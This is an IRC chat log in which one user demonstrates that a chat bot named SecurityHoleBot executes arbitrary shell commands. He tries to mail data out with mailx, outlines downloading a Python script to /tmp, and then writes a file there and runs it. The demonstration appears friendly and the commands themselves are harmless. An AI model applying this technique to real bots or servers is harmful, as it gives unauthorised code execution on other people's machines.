[23:48:34] <fyngyrz> if I had a pub thing open somewhere, I'd show you how to grab the file
[23:49:23] <fyngyrz> =[sys which mpack]
[23:49:28] <fyngyrz> nope
[23:50:34] <fyngyrz> =[sys which sendmail]
[23:50:36] <fyngyrz> nope
[23:50:48] <fyngyrz> =[sys echo test]
[23:50:49] <SecurityHoleBot> test
[23:51:52] <fyngyrz> =[sys echo "incoming" | mailx -s "Incoming" fyngyrz@gmail.com]
[23:52:24] <fyngyrz> =[sys echo "incoming" | mailx -s "Incoming" fyngyrz@gmail.com]
[23:52:54] <fyngyrz> I b'lieve your mailx has some security on it
[23:53:30] <chromas> hue
[23:53:46] <chromas> I should run it in a container
[23:53:59] <fyngyrz> so... to get around that, if I were of a mind to, I'd build a python program that contained all it needed, then send it to tmp, then it do the mailing, or, I could put a short python program in there to DL a file to tmp, then use that as the python program
[23:54:35] <fyngyrz> python /tmp/myblackprogram.py
[23:54:48] <fyngyrz> doesn't have to be executable
[23:54:53] <fyngyrz> can import whatever it likes
[23:55:00] <fyngyrz> webserver, mail... you name it
[23:55:56] <fyngyrz> =[sys echo "print 'hello'" >/tmp/bang.py]
[23:56:13] <fyngyrz> =[sys more /tmp/bang.py]
[23:56:13] <SecurityHoleBot> ::::::::::::::
[23:56:14] <SecurityHoleBot> /tmp/bang.py
[23:56:14] <SecurityHoleBot> ::::::::::::::
[23:56:14] <SecurityHoleBot> print 'hello'
[23:56:33] <fyngyrz> =[python /tmp/bang.py]
[23:56:34] <SecurityHoleBot> (Unknown Built-in or Squiggly: tag="python" data="/tmp/bang.py")
[23:56:44] <fyngyrz> =[sys python /tmp/bang.py]
[23:57:12] <fyngyrz> =[sys less /tmp/bang.py]
[23:57:13] <SecurityHoleBot> print 'hello'
[23:57:17] <fyngyrz> k
[23:57:27] <fyngyrz> =[sys which python]
[23:57:27] <SecurityHoleBot> /usr/bin/python
[23:57:44] <fyngyrz> =[sys ls -l /usr/bin/python]
[23:57:45] <SecurityHoleBot> lrwxrwxrwx 1 root root 7 Jan 10 15:51 /usr/bin/python -> python3
[23:57:54] <fyngyrz> oh
[23:57:56] <fyngyrz> python3
[23:58:15] <fyngyrz> =[sys echo "print ('hello')" >/tmp/bang.py]
[23:58:23] <fyngyrz> =[sys python /tmp/bang.py]
[23:58:24] <SecurityHoleBot> hello
[23:58:27] <fyngyrz> there you go
[23:58:40] <fyngyrz> that's me, running arbitrary executable on your machine
[23:59:09] <chromas> like running a web browser
[23:59:38] <fyngyrz> or a web server. Or a pyuthon email client that uses whatever mail facility I desire
[23:59:56] <fyngyrz> and tht bit about no multiple statements on a line...